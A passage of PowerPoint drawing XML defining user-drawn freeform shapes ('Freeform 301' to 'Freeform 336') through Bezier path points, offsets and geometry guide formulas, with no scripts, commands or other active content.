                      <a:pt x="136" y="138"/>
                      <a:pt x="132" y="138"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="130" y="138"/>
                      <a:pt x="129" y="137"/>
                      <a:pt x="128" y="134"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="128" y="133"/>
                      <a:pt x="128" y="131"/>
                      <a:pt x="128" y="129"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="128" y="121"/>
                      <a:pt x="127" y="114"/>
                      <a:pt x="124" y="107"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="123" y="103"/>
                      <a:pt x="121" y="98"/>
                      <a:pt x="118" y="95"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="117" y="95"/>
                      <a:pt x="117" y="94"/>
                      <a:pt x="117" y="94"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="115" y="86"/>
                      <a:pt x="113" y="79"/>
                      <a:pt x="108" y="72"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="106" y="70"/>
                      <a:pt x="105" y="67"/>
                      <a:pt x="106" y="64"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="106" y="62"/>
                      <a:pt x="107" y="60"/>
                      <a:pt x="107" y="58"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="108" y="56"/>
                      <a:pt x="107" y="54"/>
                      <a:pt x="104" y="53"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="101" y="52"/>
                      <a:pt x="98" y="51"/>
                      <a:pt x="94" y="49"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="92" y="48"/>
                      <a:pt x="91" y="47"/>
                      <a:pt x="91" y="44"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="91" y="43"/>
                      <a:pt x="92" y="41"/>
                      <a:pt x="92" y="40"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="93" y="37"/>
                      <a:pt x="95" y="36"/>
                      <a:pt x="98" y="37"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="100" y="37"/>
                      <a:pt x="101" y="38"/>
                      <a:pt x="102" y="40"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="103" y="42"/>
                      <a:pt x="104" y="45"/>
                      <a:pt x="102" y="48"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="102" y="48"/>
                      <a:pt x="102" y="49"/>
                      <a:pt x="103" y="50"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="104" y="51"/>
                      <a:pt x="107" y="50"/>
                      <a:pt x="107" y="48"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="108" y="44"/>
                      <a:pt x="108" y="39"/>
                      <a:pt x="106" y="35"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="104" y="31"/>
                      <a:pt x="100" y="29"/>
                      <a:pt x="96" y="30"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="92" y="30"/>
                      <a:pt x="88" y="33"/>
                      <a:pt x="87" y="38"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="87" y="39"/>
                      <a:pt x="87" y="40"/>
                      <a:pt x="87" y="42"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="87" y="43"/>
                      <a:pt x="87" y="45"/>
                      <a:pt x="87" y="47"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="85" y="45"/>
                      <a:pt x="83" y="46"/>
                      <a:pt x="81" y="46"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="81" y="46"/>
                      <a:pt x="80" y="46"/>
                      <a:pt x="80" y="46"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="79" y="46"/>
                      <a:pt x="78" y="45"/>
                      <a:pt x="78" y="44"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="78" y="41"/>
                      <a:pt x="77" y="38"/>
                      <a:pt x="77" y="36"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="77" y="35"/>
                      <a:pt x="76" y="35"/>
                      <a:pt x="76" y="34"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="75" y="32"/>
                      <a:pt x="73" y="31"/>
                      <a:pt x="71" y="31"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="68" y="31"/>
                      <a:pt x="67" y="32"/>
                      <a:pt x="66" y="34"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="63" y="39"/>
                      <a:pt x="64" y="45"/>
                      <a:pt x="66" y="50"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="67" y="50"/>
                      <a:pt x="68" y="51"/>
                      <a:pt x="68" y="51"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="69" y="51"/>
                      <a:pt x="70" y="50"/>
                      <a:pt x="70" y="49"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="69" y="48"/>
                      <a:pt x="68" y="48"/>
                      <a:pt x="67" y="47"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="66" y="45"/>
                      <a:pt x="66" y="42"/>
                      <a:pt x="67" y="40"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="68" y="37"/>
                      <a:pt x="71" y="36"/>
                      <a:pt x="73" y="38"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="75" y="39"/>
                      <a:pt x="75" y="42"/>
                      <a:pt x="75" y="44"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="76" y="46"/>
                      <a:pt x="75" y="47"/>
                      <a:pt x="73" y="48"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="73" y="48"/>
                      <a:pt x="73" y="49"/>
                      <a:pt x="73" y="49"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="71" y="51"/>
                      <a:pt x="69" y="52"/>
                      <a:pt x="67" y="54"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="66" y="54"/>
                      <a:pt x="65" y="55"/>
                      <a:pt x="64" y="56"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="64" y="58"/>
                      <a:pt x="64" y="59"/>
                      <a:pt x="65" y="60"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="66" y="60"/>
                      <a:pt x="68" y="61"/>
                      <a:pt x="68" y="62"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="71" y="66"/>
                      <a:pt x="74" y="66"/>
                      <a:pt x="78" y="66"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="83" y="66"/>
                      <a:pt x="87" y="65"/>
                      <a:pt x="91" y="63"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="95" y="62"/>
                      <a:pt x="99" y="62"/>
                      <a:pt x="101" y="58"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="101" y="58"/>
                      <a:pt x="103" y="58"/>
                      <a:pt x="103" y="58"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="104" y="58"/>
                      <a:pt x="104" y="59"/>
                      <a:pt x="103" y="60"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="103" y="60"/>
                      <a:pt x="103" y="61"/>
                      <a:pt x="102" y="61"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="97" y="63"/>
                      <a:pt x="92" y="65"/>
                      <a:pt x="87" y="67"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="83" y="69"/>
                      <a:pt x="79" y="69"/>
                      <a:pt x="75" y="69"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="74" y="69"/>
                      <a:pt x="72" y="69"/>
                      <a:pt x="71" y="68"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="73" y="45"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="73" y="43"/>
                      <a:pt x="73" y="41"/>
                      <a:pt x="72" y="40"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="72" y="40"/>
                      <a:pt x="71" y="40"/>
                      <a:pt x="71" y="40"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="71" y="40"/>
                      <a:pt x="71" y="41"/>
                      <a:pt x="71" y="41"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="72" y="41"/>
                      <a:pt x="72" y="42"/>
                      <a:pt x="72" y="44"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="72" y="44"/>
                      <a:pt x="72" y="45"/>
                      <a:pt x="73" y="45"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="97" y="39"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="99" y="40"/>
                      <a:pt x="100" y="42"/>
                      <a:pt x="100" y="44"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="101" y="43"/>
                      <a:pt x="101" y="43"/>
                      <a:pt x="101" y="42"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="101" y="41"/>
                      <a:pt x="101" y="40"/>
                      <a:pt x="100"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301"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6802" y="789"/>
                <a:ext cx="3" cy="2"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 3 w 3"/>
                  <a:gd name="T1" fmla="*/ 0 h 2"/>
                  <a:gd name="T2" fmla="*/ 2 w 3"/>
                  <a:gd name="T3" fmla="*/ 1 h 2"/>
                  <a:gd name="T4" fmla="*/ 0 w 3"/>
                  <a:gd name="T5" fmla="*/ 2 h 2"/>
                  <a:gd name="T6" fmla="*/ 1 w 3"/>
                  <a:gd name="T7" fmla="*/ 1 h 2"/>
                  <a:gd name="T8" fmla="*/ 2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cubicBezTo>
                      <a:pt x="2" y="0"/>
                      <a:pt x="2" y="1"/>
                      <a:pt x="2" y="1"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1" y="2"/>
                      <a:pt x="1" y="2"/>
                      <a:pt x="0" y="2"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="2"/>
                      <a:pt x="0" y="1"/>
                      <a:pt x="1" y="1"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1" y="0"/>
                      <a:pt x="2" y="0"/>
                      <a:pt x="2"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Freeform 302"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6815" y="789"/>
                <a:ext cx="4" cy="1"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 3"/>
                  <a:gd name="T1" fmla="*/ 0 h 1"/>
                  <a:gd name="T2" fmla="*/ 2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2" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="3" y="0"/>
                      <a:pt x="3" y="1"/>
                      <a:pt x="3" y="1"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="3" y="1"/>
                      <a:pt x="2"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Freeform 303"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="203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Freeform 304"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="222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305"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2425" y="1468"/>
                <a:ext cx="82"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Freeform 306"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2573"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307"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2768"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Freeform 308"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2965"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309"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3114"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Freeform 310"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3311" y="1468"/>
                <a:ext cx="83"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311"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3460"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Freeform 312"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3609"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1" y="134"/>
                      <a:pt x="0" y="120"/>
                      <a:pt x="0" y="105"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="88"/>
                      <a:pt x="2" y="73"/>
                      <a:pt x="4" y="59"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="7" y="46"/>
                      <a:pt x="11" y="35"/>
                      <a:pt x="17" y="26"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="23" y="18"/>
                      <a:pt x="30" y="11"/>
                      <a:pt x="38" y="6"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="46" y="2"/>
                      <a:pt x="55"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313"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3794" y="147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Freeform 314"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4223"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1 w 63"/>
                  <a:gd name="T19" fmla="*/ 44 h 241"/>
                  <a:gd name="T20" fmla="*/ 41 w 63"/>
                  <a:gd name="T21" fmla="*/ 85 h 241"/>
                  <a:gd name="T22" fmla="*/ 21 w 63"/>
                  <a:gd name="T23" fmla="*/ 120 h 241"/>
                  <a:gd name="T24" fmla="*/ 21 w 63"/>
                  <a:gd name="T25" fmla="*/ 120 h 241"/>
                  <a:gd name="T26" fmla="*/ 41 w 63"/>
                  <a:gd name="T27" fmla="*/ 155 h 241"/>
                  <a:gd name="T28" fmla="*/ 41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1" y="27"/>
                      <a:pt x="41" y="44"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="41" y="85"/>
                      <a:pt x="41" y="85"/>
                      <a:pt x="41" y="85"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="41" y="104"/>
                      <a:pt x="34" y="115"/>
                      <a:pt x="21" y="120"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="21" y="120"/>
                      <a:pt x="21" y="120"/>
                      <a:pt x="21" y="120"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="34" y="124"/>
                      <a:pt x="41" y="136"/>
                      <a:pt x="41" y="155"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="41" y="195"/>
                      <a:pt x="41" y="195"/>
                      <a:pt x="41" y="195"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="41" y="205"/>
                      <a:pt x="43" y="212"/>
                      <a:pt x="46" y="217"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="49"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315"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4330" y="1473"/>
                <a:ext cx="77" cy="294"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 63 w 63"/>
                  <a:gd name="T1" fmla="*/ 128 h 241"/>
                  <a:gd name="T2" fmla="*/ 42 w 63"/>
                  <a:gd name="T3" fmla="*/ 157 h 241"/>
                  <a:gd name="T4" fmla="*/ 42 w 63"/>
                  <a:gd name="T5" fmla="*/ 198 h 241"/>
                  <a:gd name="T6" fmla="*/ 0 w 63"/>
                  <a:gd name="T7" fmla="*/ 241 h 241"/>
                  <a:gd name="T8" fmla="*/ 0 w 63"/>
                  <a:gd name="T9" fmla="*/ 223 h 241"/>
                  <a:gd name="T10" fmla="*/ 17 w 63"/>
                  <a:gd name="T11" fmla="*/ 216 h 241"/>
                  <a:gd name="T12" fmla="*/ 22 w 63"/>
                  <a:gd name="T13" fmla="*/ 195 h 241"/>
                  <a:gd name="T14" fmla="*/ 22 w 63"/>
                  <a:gd name="T15" fmla="*/ 155 h 241"/>
                  <a:gd name="T16" fmla="*/ 42 w 63"/>
                  <a:gd name="T17" fmla="*/ 120 h 241"/>
                  <a:gd name="T18" fmla="*/ 42 w 63"/>
                  <a:gd name="T19" fmla="*/ 120 h 241"/>
                  <a:gd name="T20" fmla="*/ 22 w 63"/>
                  <a:gd name="T21" fmla="*/ 85 h 241"/>
                  <a:gd name="T22" fmla="*/ 22 w 63"/>
                  <a:gd name="T23" fmla="*/ 44 h 241"/>
                  <a:gd name="T24" fmla="*/ 0 w 63"/>
                  <a:gd name="T25" fmla="*/ 17 h 241"/>
                  <a:gd name="T26" fmla="*/ 0 w 63"/>
                  <a:gd name="T27" fmla="*/ 0 h 241"/>
                  <a:gd name="T28" fmla="*/ 42 w 63"/>
                  <a:gd name="T29" fmla="*/ 43 h 241"/>
                  <a:gd name="T30" fmla="*/ 42 w 63"/>
                  <a:gd name="T31" fmla="*/ 83 h 241"/>
                  <a:gd name="T32" fmla="*/ 63 w 63"/>
                  <a:gd name="T33" fmla="*/ 112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Freeform 316"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4441"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317"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4636"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Freeform 318"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4833"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319"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4982"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Freeform 320"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5180" y="1468"/>
                <a:ext cx="82"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321"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5330"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Freeform 322"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5477"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3"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Freeform 323"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="567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Freeform 324"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5824" y="1468"/>
                <a:ext cx="83" cy="244"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 68 w 68"/>
                  <a:gd name="T1" fmla="*/ 200 h 200"/>
                  <a:gd name="T2" fmla="*/ 45 w 68"/>
                  <a:gd name="T3" fmla="*/ 200 h 200"/>
                  <a:gd name="T4" fmla="*/ 45 w 68"/>
                  <a:gd name="T5" fmla="*/ 31 h 200"/>
                  <a:gd name="T6" fmla="*/ 38 w 68"/>
                  <a:gd name="T7" fmla="*/ 36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6"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="34" y="39"/>
                      <a:pt x="31"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325"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="597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Freeform 326"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="616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Freeform 327"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="636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Freeform 328"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="655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Freeform 329"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="675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Freeform 330"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6897"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2 w 63"/>
                  <a:gd name="T19" fmla="*/ 44 h 241"/>
                  <a:gd name="T20" fmla="*/ 42 w 63"/>
                  <a:gd name="T21" fmla="*/ 85 h 241"/>
                  <a:gd name="T22" fmla="*/ 21 w 63"/>
                  <a:gd name="T23" fmla="*/ 120 h 241"/>
                  <a:gd name="T24" fmla="*/ 21 w 63"/>
                  <a:gd name="T25" fmla="*/ 120 h 241"/>
                  <a:gd name="T26" fmla="*/ 42 w 63"/>
                  <a:gd name="T27" fmla="*/ 155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2" y="27"/>
                      <a:pt x="42" y="44"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="42" y="85"/>
                      <a:pt x="42" y="85"/>
                      <a:pt x="42" y="85"/>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Freeform 331"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7004" y="1473"/>
                <a:ext cx="78"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6 h 241"/>
                  <a:gd name="T12" fmla="*/ 22 w 64"/>
                  <a:gd name="T13" fmla="*/ 195 h 241"/>
                  <a:gd name="T14" fmla="*/ 22 w 64"/>
                  <a:gd name="T15" fmla="*/ 155 h 241"/>
                  <a:gd name="T16" fmla="*/ 43 w 64"/>
                  <a:gd name="T17" fmla="*/ 120 h 241"/>
                  <a:gd name="T18" fmla="*/ 43 w 64"/>
                  <a:gd name="T19" fmla="*/ 120 h 241"/>
                  <a:gd name="T20" fmla="*/ 22 w 64"/>
                  <a:gd name="T21" fmla="*/ 85 h 241"/>
                  <a:gd name="T22" fmla="*/ 22 w 64"/>
                  <a:gd name="T23" fmla="*/ 44 h 241"/>
                  <a:gd name="T24" fmla="*/ 0 w 64"/>
                  <a:gd name="T25" fmla="*/ 17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Freeform 332"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7116"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333"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7311"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7" y="191"/>
                      <a:pt x="89" y="196"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="81" y="200"/>
                      <a:pt x="72" y="202"/>
                      <a:pt x="62" y="202"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="52" y="202"/>
                      <a:pt x="43" y="200"/>
                      <a:pt x="35" y="196"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="27"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5"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Freeform 334"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7509"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Freeform 335"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7657"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Freeform 336"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3990" y="1460"/>
                <a:ext cx="218"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60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1 w 179"/>
                  <a:gd name="T23" fmla="*/ 84 h 209"/>
                  <a:gd name="T24" fmla="*/ 58 w 179"/>
                  <a:gd name="T25" fmla="*/ 28 h 209"/>
                  <a:gd name="T26" fmla="*/ 117 w 179"/>
                  <a:gd name="T27" fmla="*/ 18 h 209"/>
                  <a:gd name="T28" fmla="*/ 159 w 179"/>
                  <a:gd name="T29" fmla="*/ 129 h 209"/>
                  <a:gd name="T30" fmla="*/ 152 w 179"/>
                  <a:gd name="T31" fmla="*/ 152 h 209"/>
                  <a:gd name="T32" fmla="*/ 128 w 179"/>
                  <a:gd name="T33" fmla="*/ 151 h 209"/>
                  <a:gd name="T34" fmla="*/ 122 w 179"/>
                  <a:gd name="T35" fmla="*/ 186 h 209"/>
                  <a:gd name="T36" fmla="*/ 165 w 179"/>
                  <a:gd name="T37" fmla="*/ 187 h 209"/>
                  <a:gd name="T38" fmla="*/ 171 w 179"/>
                  <a:gd name="T39" fmla="*/ 174 h 209"/>
                  <a:gd name="T40" fmla="*/ 160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9 h 209"/>
                  <a:gd name="T84" fmla="*/ 86 w 179"/>
                  <a:gd name="T85" fmla="*/ 42 h 209"/>
                  <a:gd name="T86" fmla="*/ 77 w 179"/>
                  <a:gd name="T87" fmla="*/ 45 h 209"/>
                  <a:gd name="T88" fmla="*/ 65 w 179"/>
                  <a:gd name="T89" fmla="*/ 35 h 209"/>
                  <a:gd name="T90" fmla="*/ 67 w 179"/>
                  <a:gd name="T91" fmla="*/ 48 h 209"/>
                  <a:gd name="T92" fmla="*/ 73 w 179"/>
                  <a:gd name="T93" fmla="*/ 49 h 209"/>
                  <a:gd name="T94" fmla="*/ 65 w 179"/>
                  <a:gd name="T95" fmla="*/ 60 h 209"/>
                  <a:gd name="T96" fmla="*/ 101 w 179"/>
                  <a:gd name="T97" fmla="*/ 59 h 209"/>
                  <a:gd name="T98" fmla="*/ 86 w 179"/>
                  <a:gd name="T99" fmla="*/ 68 h 209"/>
                  <a:gd name="T100" fmla="*/ 71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6"/>
                      <a:pt x="166" y="169"/>
                      <a:pt x="170" y="171"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="172" y="172"/>
                      <a:pt x="174" y="173"/>
                      <a:pt x="175" y="174"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
